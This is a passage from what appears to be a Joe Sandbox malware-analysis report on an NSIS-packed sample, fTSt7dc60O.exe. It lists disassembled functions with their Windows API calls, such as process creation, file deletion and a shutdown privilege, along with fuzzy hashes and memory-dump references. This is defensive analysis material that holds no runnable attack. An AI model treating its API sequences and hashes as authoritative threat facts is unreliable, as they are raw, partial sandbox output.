                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 1404258612-0
                                                      • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                      • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                      • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                      • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                      Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                      • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                      • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                      • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                      Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                      • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                      • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                      • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                      Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                      Strings
                                                      • Error launching installer, xrefs: 004056D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                      Function 0040388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,00403861,771B3420,0040366C,?), ref: 004038A4
                                                      • GlobalFree.KERNEL32(?), ref: 004038AB
                                                      Strings
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040389C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Free$GlobalLibrary
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 1100898210-2382934351
                                                      • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                      • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                      • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                      • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                      Function 004059DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 004059E5
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 004059F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-3976562730
                                                      • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                      • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                      • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                      • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                      Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                      Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                      Non-executed Functions

                                                      Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                      • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                      • DeleteObject.GDI32(00000000), ref: 00404C64
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                      • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                      • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                      • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                      • ShowWindow.USER32(00000000), ref: 0040514F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                      • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                      • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                      • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                      Function 0040335A Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 383stringfilecomCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • #17.COMCTL32 ref: 00403379
                                                      • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                      • OleInitialize.OLE32(00000000), ref: 0040338B
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                      • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                      • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                      • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                      • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                      • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                      • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                      • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                      • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                      • OleUninitialize.OLE32(?), ref: 0040366C
                                                      • ExitProcess.KERNEL32 ref: 0040368C
                                                      • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                      • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                      • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                      • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                      • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                      • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                      • ExitProcess.KERNEL32 ref: 00403827
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                      • API String ID: 4107622049-1875889550
                                                      • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                      • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                      • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                      • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                      Function 004057D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,00436800,771B2EE0,00434000), ref: 004057F9
                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405841
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405864
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040586A
                                                      • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040587A
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                      • FindClose.KERNEL32(00000000), ref: 00405929
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: \*.*
                                                      • API String ID: 2035342205-1173974218
                                                      • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                      • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
